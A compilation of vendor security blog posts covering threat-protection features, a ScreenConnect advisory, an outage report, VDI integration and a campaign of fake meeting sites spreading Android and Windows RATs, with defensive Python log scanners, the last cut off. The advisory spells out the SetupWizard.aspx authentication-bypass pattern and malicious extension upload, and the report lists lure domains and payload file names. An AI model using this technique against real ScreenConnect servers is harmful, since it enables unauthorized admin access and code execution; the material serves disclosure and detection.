Zscaler can inspect a website’s content for indications that it is a phishing site, and then use AI to stop phishing attack vectors. As part of a highly commoditized attack method, phishing pages can have a lifespan of a few hours, yet most phishing URL feeds lag 24 hours behind—that gap can only be addressed by a capability able to stop both new and unknown phishing attacks.

Spyware Callback
Adware and spyware sites gather users’ information without their knowledge and sell it to advertisers or criminals. When “Spyware Callback” blocking is enabled, Zscaler ATP prevents spyware from calling home and transmitting sensitive user data such as address, date of birth, and credit card information.

Cryptomining
Most organizations block cryptomining traffic to prevent cryptojacking, where malicious scripts or programs secretly use a device to mine cryptocurrency—this malware also consumes resources and impacts the performance of infected machines. Enabling “Block” in ATP’s configuration settings prevents cryptomining from entering your environment via user devices.

Known Adware & Spyware Sites
Threat actors stage legitimate-looking websites designed to distribute potentially unwanted applications (PUA).
These web requests can be denied based on the reputation of the destination IP or domain name. Choose “Block” in the ATP policy configuration to prevent your users from accessing known adware and spyware sites.

Shut down unauthorized communication
Unauthorized communication refers to the tactics and tools attackers use to bypass firewalls and proxies, such as IRC tunneling applications and "anonymizer" websites.

IRC Tunneling
The Internet Relay Chat (IRC) protocol was created in 1988 to allow real-time text messaging between internet-connected computers. Primarily used in chat rooms (or “channels”), the IRC protocol also supports data transfer as well as server- and client-side commands. While most firewalls block the IRC protocol, they may allow SSH connections. Hackers take advantage of this to tunnel their IRC connections via SSH, bypass firewalls, and exfiltrate data. Enabling this policy option will block IRC traffic from being tunneled over HTTP/S.

SSH Tunneling
SSH tunneling enables sending data over an existing SSH connection, with the traffic tunneled over HTTP/S. While there are legitimate uses for SSH tunnels, bad actors can use them as an evasion technique to exfiltrate data. Zscaler ATP can block this activity.

Anonymizers
Attackers use anonymizer applications to obscure the destination and content they want to access. Anonymizers enable the user to bypass policies that control access to websites and internet resources. Enabling this policy option blocks access to anonymizer sites.

Block cross-site scripting (XSS) and other malicious web requests
Cross-site scripting (XSS) is an attack tactic wherein bad actors inject malicious scripts into otherwise trusted websites. XSS attacks occur when a threat actor uses a web app to send malicious code, usually in the form of a client-side script, to a different end user.
Cookie Stealing
Cookie stealing, or session hijacking, occurs when bad actors harvest session cookies from users’ web browsers so they can gain access to sensitive data, including valuable personal and financial details that they in turn sell on the dark web or use for identity theft. Attackers also use cookies to impersonate a user and log in to their social media accounts.

Potentially Malicious Requests
Variants of XSS requests enable attackers to exploit vulnerabilities in a web application so they can inject malicious code into a website. When other users load a page from the target web server in their browser, the malicious code executes, expanding the attack exponentially.

Prevent compromise via peer-to-peer file sharing
P2P programs enable users to easily share files with each other over the internet. While there are legitimate uses of P2P file sharing, these tools are also frequently used to illegally acquire copyrighted or protected content—and the same content files can contain malware embedded within legitimate data or programs.

BitTorrent
The Zscaler service can block the usage of BitTorrent, a communication protocol for decentralized file transfers supported by various client applications. While its usage was once pervasive, global torrent traffic has decreased from a high of 35% in the mid-2000s to just 3% of all global internet traffic in 2022.

Tor
Tor is a P2P anonymizer protocol that obscures the destination and content accessed by a user, enabling them to bypass policies controlling what websites or internet resources they can access. With Zscaler ATP, you can block the usage of the Tor protocol.

Avoid VOIP bandwidth overutilization
While convenient for online meetings, video conferencing tools can be bandwidth-intensive. They may also be used to transfer files or other sensitive data. Depending on both your organization's risk tolerance level and overall network performance, you may want to curtail employee or contractor use of Google Hangouts.
Google Hangouts
While VOIP application usage may be encouraged for cost savings over traditional landline-based communications, it’s often associated with high bandwidth usage. Google Hangouts (a.k.a. Google Meet) requires a single video call participant to meet a 3.2 Mbps outbound bandwidth threshold. The inbound bandwidth required starts at 2.6 Mbps for two users and grows with additional participants. In Zscaler ATP, you can block Google Hangouts usage to conserve bandwidth for other business-critical applications.

Comprehensive, always-on, real-time protection
Clearly, there’s a wide swath of protection modern organizations need to fortify their security posture on an ongoing basis. Zscaler Advanced Threat Protection delivers always-on protection against ransomware, zero-day threats, and unknown malware as part of the most comprehensive suite of security capabilities, powered by the world's largest security cloud—all at no extra cost to ZIA customers. ATP filters and blocks threats directed at ZIA customers and, in combination with Zscaler Firewall and Zscaler Sandbox, provides superior threat prevention thanks to:

A fully integrated suite of AI-powered security services that closes security gaps and reduces risks left by other vendors’ security tools. Zscaler Sandbox detects zero-day malware for future-proof protection while Zscaler Firewall provides IPS and DNS control and filtering of the latest non-web threats.

Real-time threat visibility to stay several steps ahead of threat actors. You can’t wait for another vendor’s tool to finish scheduled scans to determine if you’re secure—that puts your organization at risk. Effective advanced threat protection from Zscaler monitors all your traffic at all times.

Centralized context and correlation that provides the full picture for faster threat detection and prevention. Real-time, predictive cybersecurity measures powered by advanced AI continuously give your IT or security team the ability to outpace attackers.
The ability to inspect 100% of traffic with Zscaler’s security cloud distributed across 150 points of presence worldwide. Operating as a cloud-native proxy, the Zscaler Zero Trust Exchange ensures that every packet from every user, on or off-network, is fully inspected with unlimited capacity—including all TLS/SSL encrypted traffic.

Learn more about how Zscaler prevents encrypted attacks and best practices to stop encrypted threats by securing TLS/SSL traffic: download a copy of the Zscaler ThreatLabz 2023 State of Encrypted Attacks Report.

Mon, 11 Mar 2024 07:00:01 -0700 Brendon Macaraeg

Multiple Vulnerabilities Found In ConnectWise ScreenConnect

Introduction
On February 19, 2024, ConnectWise released an advisory disclosing critical vulnerabilities impacting ScreenConnect Remote Monitoring and Management (RMM) software. The first vulnerability, tracked as CVE-2024-1709, allows threat actors to bypass authentication and exploit a second vulnerability, CVE-2024-1708. The second vulnerability is a path traversal flaw that enables attackers to upload a malicious file, potentially leading to Remote Code Execution (RCE) on affected versions of ScreenConnect instances. The technical details of these vulnerabilities underscore their easy exploitability, using common tactics, techniques, and procedures (TTPs) that could lead to data exfiltration and lateral movement across compromised instances.

Recommendations
Zscaler ThreatLabz strongly recommends that on-premises users of ConnectWise ScreenConnect software promptly upgrade to the latest version, which contains crucial fixes to mitigate the vulnerabilities identified as CVE-2024-1709 and CVE-2024-1708.

Affected Versions
The following versions of ConnectWise ScreenConnect are affected by the disclosed vulnerabilities and should be updated immediately:
ScreenConnect 23.9.7 and prior

Background
ConnectWise ScreenConnect enables users to manage, connect, and access systems remotely.
The remote access solution is available for on-prem and cloud architectures. ConnectWise’s advisory prompted the Cybersecurity & Infrastructure Security Agency (CISA) to add CVE-2024-1709 to its Known Exploited Vulnerabilities Catalog. CVE-2024-1709 earned a critical CVSS score of 10.0, while CVE-2024-1708 received a score of 8.4.

CVE-2024-1709 allows a remote attacker to gain access to systems with admin privileges. Once inside the compromised system, the attacker leverages CVE-2024-1708 to upload malicious files to the compromised system and potentially achieve RCE. An attacker can exploit these vulnerabilities to:
Access, upload, or modify important files
Steal sensitive information and disrupt critical services
Move laterally on the breached network

How It Works
The attack sequence begins by sending a malformed HTTP request to the vulnerable ScreenConnect instance. Specifically, this means appending any character to the /SetupWizard.aspx URL (i.e., /SetupWizard.aspx<something>) to gain unauthenticated access to the /SetupWizard.aspx page. The /SetupWizard.aspx page allows the attacker to create a new user account with administrator privileges, even on a pre-configured instance, without requiring any authentication. This exploit is possible due to a flaw in the SetupWizard.aspx file, which is responsible for the initial administrator setup and license validation on the instance.

Once inside the system, the attacker uploads a malicious ASHX ScreenConnect extension, packaged in a ZIP archive, to achieve RCE and later obtain a remote web shell. The attack sequence is shown in Figure 1.

Figure 1: A diagram illustrating how an attacker targets a vulnerable ScreenConnect instance.

Exploitation Steps
1. Malformed HTTP Request: The attacker launches the attack by sending a malformed HTTP request to the vulnerable ScreenConnect instance, as shown below.

Figure 2: An example of a malformed HTTP request targeting CVE-2024-1709.
The figure below shows CVE-2024-1709 exploitation via a 302 redirect to the /SetupWizard.aspx page.

Figure 3: Exploitation of CVE-2024-1709.

2. Arbitrary Admin Account Creation: Upon receiving the malicious request, the ScreenConnect instance processes the request and redirects to the /SetupWizard.aspx page, where the attacker can create an administrator account, as shown in Figure 4.

Figure 4: The ScreenConnect page where the attacker can fraudulently create an administrator user account.

The figure below includes XML showing that the attacker was able to successfully create an administrator user account.

Figure 5: ScreenConnect\App_Data\User.xml shows evidence of the attacker-created administrator user account.

3. Malicious Payload Delivery: The attacker uploads a malicious ScreenConnect extension (shown in Figure 6) wrapped in a ZIP archive to the vulnerable instance. This ZIP archive contains an ASHX file designed to exploit CVE-2024-1708 and facilitate RCE on the vulnerable system.

Figure 6: A POST transaction depicting the installation of a malicious extension on a ScreenConnect instance.

4. Malicious Code Execution: Following the successful upload of the malicious ScreenConnect extension (.ashx file), the vulnerable system executes the code contained within the payload, as shown in Figure 7. This execution grants the attacker unauthorized access and control over the compromised system, enabling further exploitation and privilege escalation.

Figure 7: The malicious ZIP archive uploaded by the attacker, containing a Base64-encoded command invoking cmd.exe for remote code execution.

According to reports, the post-exploitation phase included the deployment of ToddlerShark malware, leveraging the second vulnerability. ToddlerShark malware demonstrates polymorphic behavior and utilizes legitimate Microsoft binaries and alternate data streams.
It bears a striking resemblance to BabyShark malware, which has been associated with the North Korean APT group known as Kimsuky.

Zscaler Best Practices
Safeguard crown jewel applications by limiting lateral movement using Zscaler Private Access™ with advanced Deception turned on.
Route all server traffic through Zscaler Private Access™ with the application security module enabled and Zscaler Internet Access™, which provides visibility to identify and stop malicious activity from compromised systems/servers.
Turn on Zscaler Advanced Threat Protection™ to block all known command-and-control (C2) domains — thereby adding another layer of protection if an attacker exploits this vulnerability to implant malware.
Extend command-and-control (C2) protection to all ports and protocols with Zscaler Cloud Firewall™ (Cloud IPS module), including emerging C2 destinations. Doing so provides additional protection if the attacker exploits this vulnerability to implant malware.
Use Zscaler Cloud Sandbox™ to prevent unknown malware delivered as part of a second-stage payload.
Inspect all TLS/SSL traffic and restrict traffic to critical infrastructure from an allowed list of known-good destinations.

Conclusion
To ensure security, ConnectWise ScreenConnect users should promptly update their on-prem deployments to version 23.9.8 or above. Cloud-based deployments, on the other hand, do not require any action, as ConnectWise has already applied the necessary patches. Failing to update exposes systems to vulnerabilities such as CVE-2024-1709 and CVE-2024-1708. These vulnerabilities enable threat actors to manipulate server configurations, gain administrator-level privileges, and execute remote code.
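As an added example (not code from ConnectWise, Huntress or Zscaler), the following Python script performs two defender-side checks that follow directly from the description above: a version gate for the affected range (23.9.7 and prior, fixed in 23.9.8) and a scan of web-server access logs for the /SetupWizard.aspx<something> request pattern that characterizes CVE-2024-1709, plus a match against the IOC addresses listed in the next section. The log lines are constructed in combined log format using documentation address space, so LOG_RE is an assumption to adapt to your proxy or IIS log format.

```python
"""Defender-side checks for the ScreenConnect issues described above.

Added example, not vendor code. The version gate follows the affected range
stated in the advisory (23.9.7 and prior; first fixed release 23.9.8). The log
scan looks for any request whose path is /SetupWizard.aspx with extra characters
appended (the CVE-2024-1709 pattern), for any hit on the setup wizard at all on
an already-configured instance, and for the advisory's IOC addresses. The sample
log lines are constructed; LOG_RE assumes Apache/IIS-style combined log format."""
import re

FIXED_VERSION = (23, 9, 8)  # first fixed release named above

# IOC addresses from the ConnectWise advisory as quoted in this report
KNOWN_BAD_IPS = {"155.133.5.15", "155.133.5.14", "118.69.65.60"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_version(version):
    """'23.9.7.8556' -> (23, 9, 7, 8556); tuples compare component-wise."""
    return tuple(int(part) for part in version.strip().split("."))


def is_vulnerable(version):
    """True for any build below 23.9.8, i.e. the affected range stated above."""
    return parse_version(version) < FIXED_VERSION


def parse_line(line):
    """Return the request fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["path"] = entry["target"].split("?", 1)[0]  # drop any query string
    return entry


def classify(entry):
    """Flags for one request; order is fixed so results are comparable."""
    flags = []
    path = entry["path"]
    # CVE-2024-1709 pattern: anything appended after /SetupWizard.aspx
    if re.fullmatch(r"/SetupWizard\.aspx.+", path, re.I):
        flags.append("setupwizard_bypass")
    # On a configured instance the wizard should never be reached; review any hit
    elif path.lower() == "/setupwizard.aspx":
        flags.append("setupwizard_access")
    if entry["ip"] in KNOWN_BAD_IPS:
        flags.append("known_bad_ip")
    return flags


def scan_log(lines):
    """Return only the entries that raised at least one flag."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        flags = classify(entry)
        if flags:
            findings.append({"ip": entry["ip"], "method": entry["method"],
                             "path": entry["path"], "status": entry["status"],
                             "flags": flags})
    return findings


# Constructed sample log. 203.0.113.x is documentation address space; the
# 155.133.5.15 lines reuse one of the IOC addresses quoted in this report.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Feb/2024:09:58:12 +0000] "GET / HTTP/1.1" 200 4021
155.133.5.15 - - [20/Feb/2024:10:00:01 +0000] "GET /SetupWizard.aspx/ HTTP/1.1" 302 0
155.133.5.15 - - [20/Feb/2024:10:00:02 +0000] "POST /SetupWizard.aspx HTTP/1.1" 200 1188
203.0.113.9 - - [20/Feb/2024:10:05:44 +0000] "GET /favicon.ico HTTP/1.1" 200 1150
"""

if __name__ == "__main__":
    for v in ("23.9.7", "23.9.8", "23.9.7.8556"):
        print(v, "vulnerable" if is_vulnerable(v) else "fixed")
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f["ip"], f["method"], f["path"], f["status"], ",".join(f["flags"]))
```

The 302 on the trailing-slash request followed by a POST to the wizard from the same address is the sequence steps 1 and 2 above describe (redirect to the wizard, then account creation), so a finding pair like the one in the sample should be escalated and the instance's User.xml reviewed for accounts that nobody created.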
Indicators of Compromise
ConnectWise reported active exploitation of CVE-2024-1709 and released the following Indicators of Compromise (IOCs):
155[.]133[.]5[.]15
155[.]133[.]5[.]14
118[.]69[.]65[.]60

Zscaler Coverage
The Zscaler ThreatLabz team has deployed the following:
Zscaler Advanced Threat Protection: APP.EXPLOIT.CVE-2024-1708_CVE-2024-1709
Zscaler Private Access AppProtection: 6000760 - ConnectWise ScreenConnect SetupModule Authentication Bypass (CVE-2024-1709)

For more details, visit the Zscaler Threat Library.

References
Understanding the ConnectWise ScreenConnect CVE-2024-1709 & CVE-2024-1708 | Huntress Blog
Detection Guidance for ConnectWise CWE-288

Mon, 11 Mar 2024 14:30:19 -0700 Arkaprava Tripathi

LinkedIn Outage Detected by Zscaler Digital Experience (ZDX)
At 3:40 p.m. EST on March 6, 2024, Zscaler Digital Experience (ZDX) saw a substantial, unexpected drop in the ZDX score for LinkedIn services around the globe. Upon analysis, we noticed HTTP 503 errors highlighting a LinkedIn outage, with the ZDX heatmap clearly detailing the impact at a global scale.

ZDX dashboard indicating widespread LinkedIn outage

ZDX enables customers to proactively identify and quickly isolate service issues, giving IT teams confidence in the root cause and reducing mean time to resolve (MTTR) and mean time to detect (MTTD).

ZDX dashboard showing LinkedIn global issues

ZDX Score highlights LinkedIn outage
Visible on the ZDX admin portal dashboard, the ZDX Score represents all users in an organization across all applications, locations, and cities on a scale of 0 to 100, with the low end indicating a poor user experience. Depending on the time period and filters selected in the dashboard, the score adjusts accordingly. The dashboard shows that the ZDX Score for the LinkedIn probes dropped to ZERO during the outage window of approximately 1 hour.
From within ZDX, service desk teams can easily see that the service degradation isn't limited to a single location or user and quickly begin analyzing the root cause.

ZDX Score indicating LinkedIn outage and recovery (times in EST)

Also in the ZDX dashboard, "Web Probe Metrics" highlight the user impact of reaching LinkedIn applications across a timeline with response times. In this case, the server responded with 503 errors, indicating the server was not ready to handle requests.

ZDX Web Probe Metrics indicating 503 errors (times in EST)

ZDX can quickly identify the root cause of user experience issues with its new AI-powered root cause analysis capability. This spares IT teams the labor of sifting through fragmented data and troubleshooting, thereby accelerating resolution and keeping employees productive. With a simple click in the ZDX dashboard, you can analyze a score, and ZDX will provide insight into potential issues. As you can see, in the case of this LinkedIn outage, ZDX highlights that the application is impacted while the network itself is fine.

ZDX AI-powered root cause analysis indicates the reason for the outage

When there's an application outage, many IT teams turn to the network as the root cause. However, as you can see above, ZDX AI-powered root cause analysis verified that the network transport wasn't the issue; it was actually at the application level. You can verify this by looking at the CloudPath metrics from the user to the destination.

ZDX CloudPath showing full end-to-end data path

ZDX CloudPath detailed hops between the nodes

With AI-powered analysis and dynamic alerts, IT teams can quickly compare optimal vs. degraded user experiences and set intelligent alerts based on deviations in observed metrics. ZDX allows you to compare two points in time to understand the differences between them. This function determines a good vs. poor user experience, visually highlighting the differences between application, network, and device metrics.
The end user comparison during the LinkedIn outage vs. a known good score indicates the ZDX Score difference, highlighting the unexpected performance drop for the end user.

ZDX comparison mode identifies the change in user experience

According to the LinkedIn status page, the outage was reported at 12:50 PST until 14:05 PST, which correlates to the ZDX data above. However, LinkedIn services started to recover pretty quickly, by 13:40 PST, and LinkedIn reported the issue resolved by 14:05 PST.

Source: LinkedIn

With ZDX alerting, our customers were proactively notified about end user problems, and incidents were opened automatically with our service desk integration (e.g., ServiceNow) long before users started to report it. From a single dashboard, customers were able to quickly identify this as a LinkedIn issue, not an internal network outage, saving precious IT time. Zscaler Digital Experience successfully detected a LinkedIn outage along with its root cause, giving our customers the confidence that it was not a single location, their networks, or devices, averting critical impact to their business.

Try Zscaler Digital Experience today

ZDX helps IT teams monitor digital experiences from the end user perspective to optimize performance and rapidly fix offending application, network, and device issues. To see how ZDX can help your organization, please contact us.

Thu, 07 Mar 2024 19:14:07 -0800 Rohit Goyal

From VDI replacement to complementary use: Part 2

In the first part of this VDI blog series, we discussed the two major use cases of access granularity and traffic inspection and how Zscaler can support these with the help of the Zero Trust Exchange platform. In this blog, we will focus on more use cases and ways to integrate Zscaler as a complementary solution to VDI to cover security-related aspects.
Data residency restriction

This use case deserves a deeper investigation, because although we can say that it is supported, there could be specific instances in which Zscaler cannot replace the VDI environment. Zscaler Cloud Browser Isolation (CBI) prevents data from leaving the corporate boundary. We can define what level of restriction applies to the data exchange between the actual application and the isolated container. The recent introduction of Endpoint DLP capabilities can further help when stricter security requirements apply. Zscaler Cloud Browser Isolation is inherently non-persistent; the virtual machine is terminated after each session.

Now, imagine the scenario of a developer working remotely on a virtual desktop where he has his own environment and data can't leave the company area. This individual would need a persistent desktop to work, and the user environment shouldn't be destroyed when he closes the working session. This use case could be challenging for a VDI replacement. It could be addressed by leveraging the Private Remote Access (PRA) and RDP. In the above example, an RDP session could be launched toward a machine where the developer can work and log in, where their development environment sits and where communication is local, so data won't leave the company boundary. Obviously, the organisation's environment must be assessed carefully to validate the pros and cons of the proposed alternative.

Traffic localization

In this scenario, the goal is to keep the communication local to the data centre due to performance issues. From a Zscaler point of view, the area of potential replacement exists once we have validated with the customer the possibility of leveraging Private Remote Access (PRA) and RDP, where a remote session is launched toward a machine that interacts locally with the server.
Desktop or software license management / reduction

The discussion about this scenario, under the assumption that the VDI environment is kept up and running, needs a preamble. ZCC does not support multiple, simultaneous user sessions from a single host operating system. The main problem to address is supporting ZIA and ZPA services on multi-user VDI environments.

Zscaler now offers the ability to inspect all ports and protocols for multi-session, non-persistent VDI deployments in the public cloud and on-prem data centers through the use of a VDI agent. Enterprises can apply granular threat and data protection policies per individual user session, enabling them to maintain common security policies across all environments. Multi-user VDI can be hosted on a public cloud (Azure, AWS, etc.) or in private data centers (VMware or KVM, etc.). Cloud/Branch Connector can be used to direct traffic from the VDI users to the Zscaler cloud and extend ZIA and ZPA services to the VDI users. However, Cloud/Branch Connector does not have any user/VM context for the traffic and will enforce a single security policy for all the VDI users.

To fix this issue, we leverage a VDI agent, which is a lightweight software package running in the user space of the VDI session. It is responsible for authenticating users, establishing a tunnel to Branch or Cloud Connector (control and data) and exchanging user context with the Branch or Cloud Connector (see the diagram below). The VDI Agent maintains proprietary, lightweight tunnels (UDP encapsulation) to the local Cloud or Branch Connector. These tunnels carry both user session data in the payload and user context information in the UDP header. These tunnels are stateless, which ensures that, in the event of a Branch or Cloud Connector failure, they can fail over to other active appliances. With that said, we now have the ability to extend Zscaler services to multi-user VDI environments.
Legacy app support

Although this scenario is becoming more and more niche due to application and architecture evolution, that's an area where VDI could help customers. The Zscaler Client Connector supports the latest software version and the two previous versions for each software product. See more details on the Zscaler Help page.

At a higher level, digging into why organisations use VDI in the first place is important. Walking through their use cases and applications to explore the scope is important to move customers beyond the assumptions that flow from the on-premises/on-network mindset. In some cases, Zscaler can be integrated into the existing environment to simply provide the appropriate level of security. There are two main aspects to consider. Most applications are now web-based and could be securely made available to users regardless of VDI. Even if VDI is not replaced for all users, there are multiple reasons to integrate with ZIA/ZPA. Just think about users like financial advisors and insurance agents. Many firms have moved to web-based apps, DocuSign, etc. There may no longer be a hard requirement for those thousands of users to have VDI. This requires going beyond what the network team may see, and engaging architects, app owners, etc.

If we focus on the second aspect, rather than replacing the VDI infrastructure, another approach is to complement it. If we think about those use cases, organisations could still have security concerns around the user's connectivity to the VDI environment (e.g. VMware Knowledge Base). In these scenarios, ZPA could protect that user traffic: it can secure access "to" the VDI environment and access "from" the VDI environment, as shown in the diagram below. The protection of traffic aimed at Internet/SaaS is addressed by ZIA services.

Connectivity to the VDI environment: Organisations may either put the VDI on the edge with its own DMZ infrastructure, firewall, security gateway, load balancer, etc.
and have users connect directly, or leverage a VPN-like technology to put the user on the network to access the VDI. ZPA, with Client Connector, enables a customer to either replace their internet-facing components or replace the VPN that is putting users onto the network.

Connectivity from the VDI environment: Organisations want to further segment what users have access to from their trusted device. ZPA with Client Connector can assist with setting up granular access at the application level.

Complete alternative to VDI: Organisations can leverage alternatives to VDI such as Zscaler Browser Isolation to replace their traditional VDI architecture. The benefits remain the same: if a user has a browser managed by the enterprise which is isolated from the endpoint, the organisation's admin remains in control of what can be egressed. The benefit of such an approach is the significantly lower overhead of managing such a capability.

The Zscaler Client Connector can be installed on the user's device along with the VDI client, and ZPA carries the VDI traffic as a private application. Another option is installing ZCC on the virtual desktop instance (Citrix XenDesktop, Azure WVD, Amazon WorkSpaces) to control what the user has access to internally. Existing customers are deploying this model with WVD and Amazon WorkSpaces using ZCC for both ZIA and ZPA. Benefits in such a scenario are centralized visibility and control, and a single access control policy configuration for VDI and other forms of access, creating a consistent user experience.

Finally, a hybrid approach is feasible. In this case, organisations want to offer direct ZPA access to employees, but VDI-only access to third parties, and want to extend ZPA's centralized visibility and control to VDI users accessing private applications. All these examples show that there are multiple ways to either completely replace or complement the existing VDI installation.
Fri, 08 Mar 2024 00:59:22 -0800 Stefano Alei

Android and Windows RATs Distributed Via Online Meeting Lures

Introduction

Beginning in December 2023, Zscaler's ThreatLabz discovered a threat actor creating fraudulent Skype, Google Meet, and Zoom websites to spread malware. The threat actor spreads SpyNote RAT to Android users and NjRAT and DCRat to Windows users. This article describes and shows how the threat actor's malicious URLs and files can be identified on these fraudulent online meeting websites.

Key Takeaways

- A threat actor is distributing multiple malware families using fake Skype, Zoom, and Google Meet websites.
- The threat actor is distributing Remote Access Trojans (RATs) including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems.

Campaign Overview

The attacker utilized shared web hosting, hosting all these fake online meeting sites on a single IP address. All of the fake sites were in Russian, as shown in the figures below. In addition, the attackers hosted these fake sites using URLs that closely resembled the actual websites.

Attack Sequence

The diagram below illustrates how the malware was distributed and executed on the victim's machine during the campaign:

Figure 1: Attack chain and execution flow for Android and Windows campaigns.

When a user visits one of the fake sites, clicking on the Android button initiates the download of a malicious APK file, while clicking on the Windows button triggers the download of a BAT file. The BAT file, when executed, performs additional actions, ultimately leading to the download of a RAT payload.

Skype

During our investigation, we discovered that the first fake site, join-skype[.]info, was created in early December to deceive users into downloading a fake Skype application, as shown in Figure 2.

Figure 2: The fraudulent Skype website, with a fake domain meant to resemble the legitimate Skype domain.
(Image courtesy of

The Windows button pointed to a file named Skype8.exe and the Google Play button pointed at Skype.apk (neither of these files was available at the time of analysis). The Apple App Store button redirected to, indicating that the threat actor was not targeting iOS users with malware.

Google Meet

In late December, the attacker created another fake site, online-cloudmeeting[.]pro, mimicking Google Meet, as shown in Figure 3. The fake Google Meet site was hosted on online-cloudmeeting[.]pro/gry-ucdu-fhc/, where the subpath gry-ucdu-fhc was deliberately created to resemble a Google Meet joining link. Genuine Google Meet invite codes typically follow the structure [a-z]{3}-[a-z]{4}-[a-z]{3}. The fake site provides links to download a fake Skype application for Android and/or Windows. The Windows link leads to a BAT file named updateZoom20243001bit.bat, which in turn downloads the final payload named ZoomDirectUpdate.exe. This final payload is a WinRAR archive file that contains DCRat, packed with Eziriz .NET Reactor.

Figure 3: The fake Google Meet page, showing the fraudulent domain in the address bar for a fake Google Meet Windows application link to a malicious BAT file that downloads and executes malware.

The Android link in this figure led to a SpyNote RAT APK file named meet.apk.

Zoom

In late January, we observed the emergence of a fake Zoom site (shown in Figure 4), us06webzoomus[.]pro. The fake Zoom site, hosted at the URL us06webzoomus[.]pro/l/62202342233720Yzhkb3dHQXczZG1XS1Z3Sk9kenpkZz09/, features a subpath that closely resembles a meeting ID generated by the Zoom client. If a user clicks the Google Play link, a file named Zoom02.apk will be downloaded containing the SpyNote RAT. Similar to the fake Google Meet site, when a user clicks the Windows button it downloads a BAT file, which in turn downloads a DCRat payload.
Figure 4: The fake Zoom page, showing a domain similar to the real Zoom domain in the address bar and a link to the malicious APK file that contains SpyNote RAT when the Google Play button is clicked.

Open Directories

In addition to hosting DCRat, the fake Google Meet and Zoom websites also contain an open directory (shown in Figure 5) with two additional Windows executable files named driver.exe and meet.exe (inside the archive, which are NjRAT. The presence of these files suggests that the attacker may utilize them in other campaigns, given their distinct names.

Figure 5: Example of additional malicious files hosted on the websites hosting fake online meeting applications.

Conclusion

Our research demonstrates that businesses may be subject to threats that impersonate online meeting applications. In this example, a threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files. Our findings highlight the need for robust security measures to protect against advanced and evolving malware threats and the importance of regular updates and security patches. As cyber threats continue to evolve and become increasingly complex, it is critical to remain alert and take proactive measures to protect against them. Zscaler's ThreatLabz team is dedicated to staying on top of these threats and sharing our findings with the wider community.

Zscaler Sandbox Coverage

During our investigation of this campaign, the Zscaler sandbox played a vital role in analyzing the behavior of different files. The sandbox analysis allowed us to identify threat scores and pinpoint specific MITRE ATT&CK techniques that were triggered during the analysis process.
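As an added example (not code from the ThreatLabz post), the Python below turns the lure traits described above into a proxy-log check: a brand keyword on a host that is not the legitimate service domain, a path shaped like a Google Meet invite code ([a-z]{3}-[a-z]{4}-[a-z]{3}) or like the fake Zoom meeting link, and APK/BAT/EXE downloads from such hosts. The allowlist of legitimate domains, the Zoom link shape and the log line format are assumptions; the fake-site URLs and file names are the ones reported in the post.

```python
import re
from urllib.parse import urlparse

# Allowlist of legitimate domains per impersonated brand. Constructed for this
# example; extend it with the domains your organisation actually uses.
LEGIT_HOSTS = {
    "skype": ("skype.com",),
    "meet": ("meet.google.com",),
    "zoom": ("zoom.us",),
}

# Genuine Google Meet invite codes follow [a-z]{3}-[a-z]{4}-[a-z]{3}; the fake
# site copied that shape in its path (gry-ucdu-fhc).
MEET_CODE_RE = re.compile(r"^/[a-z]{3}-[a-z]{4}-[a-z]{3}/?$")
# The fake Zoom site used /l/<long digit run><opaque token>/ to imitate a
# meeting ID. Assumed shape: a /j/ or /l/ path segment followed by 8+ digits.
ZOOM_LINK_RE = re.compile(r"^/[jl]/[0-9]{8,}[A-Za-z0-9=]*/?$")
# File types the campaign delivered (APK for Android, BAT/EXE for Windows).
PAYLOAD_RE = re.compile(r"\.(apk|bat|exe)$", re.IGNORECASE)


def refang(url: str) -> str:
    """Turn a defanged indicator (hxxps://a[.]b) back into a parseable URL."""
    return url.replace("[.]", ".").replace("hxxp", "http")


def brand_of(host: str):
    """Coarse keyword match; tune it for your environment to limit false hits."""
    for brand in LEGIT_HOSTS:
        if brand in host:
            return brand
    return None


def is_legit_host(host: str, brand: str) -> bool:
    """True when host is, or is a subdomain of, an allowlisted brand domain."""
    return any(host == d or host.endswith("." + d) for d in LEGIT_HOSTS[brand])


def classify_url(url: str) -> dict:
    """Return {'verdict': ..., 'reasons': [...]} for one URL.

    verdict is one of: legit, lookalike, lookalike-payload, suspicious, unknown.
    """
    parsed = urlparse(refang(url.strip()))
    host = (parsed.hostname or "").lower()
    path = parsed.path or "/"
    reasons = []

    brand = brand_of(host)
    meeting_like = bool(MEET_CODE_RE.match(path) or ZOOM_LINK_RE.match(path))
    payload = bool(PAYLOAD_RE.search(path))

    if brand and is_legit_host(host, brand):
        return {"verdict": "legit", "reasons": [f"{host} is an allowlisted {brand} domain"]}

    if brand:
        reasons.append(f"{host} contains '{brand}' but is not an allowlisted domain")
        if meeting_like:
            reasons.append(f"path {path} imitates a meeting invite link")
        if payload:
            reasons.append(f"path {path} serves an executable payload")
        return {"verdict": "lookalike-payload" if payload else "lookalike", "reasons": reasons}

    if meeting_like:
        return {"verdict": "suspicious", "reasons": [f"meeting-style path {path} on unrelated host {host}"]}
    return {"verdict": "unknown", "reasons": []}


LOG_URL_RE = re.compile(r"url=(\S+)")


def scan_log(lines) -> list:
    """Return (url, verdict) for every log line whose URL is neither legit nor unknown."""
    hits = []
    for line in lines:
        m = LOG_URL_RE.search(line)
        if not m:
            continue
        result = classify_url(m.group(1))
        if result["verdict"] not in ("legit", "unknown"):
            hits.append((m.group(1), result["verdict"]))
    return hits


# Constructed proxy log lines: the fake-site URLs and file names are those
# reported in the post; users and timestamps are made up.
SAMPLE_LOG = [
    "2024-01-15T10:22:01Z user=alice url=https://meet.google.com/abc-defg-hij",
    "2024-01-15T10:23:44Z user=bob url=hxxps://online-cloudmeeting[.]pro/gry-ucdu-fhc/",
    "2024-01-15T10:23:51Z user=bob url=hxxps://online-cloudmeeting[.]pro/updateZoom20243001bit.bat",
    "2024-01-29T09:01:12Z user=carol url=hxxps://us06webzoomus[.]pro/l/62202342233720Yzhkb3dHQXczZG1XS1Z3Sk9kenpkZz09/",
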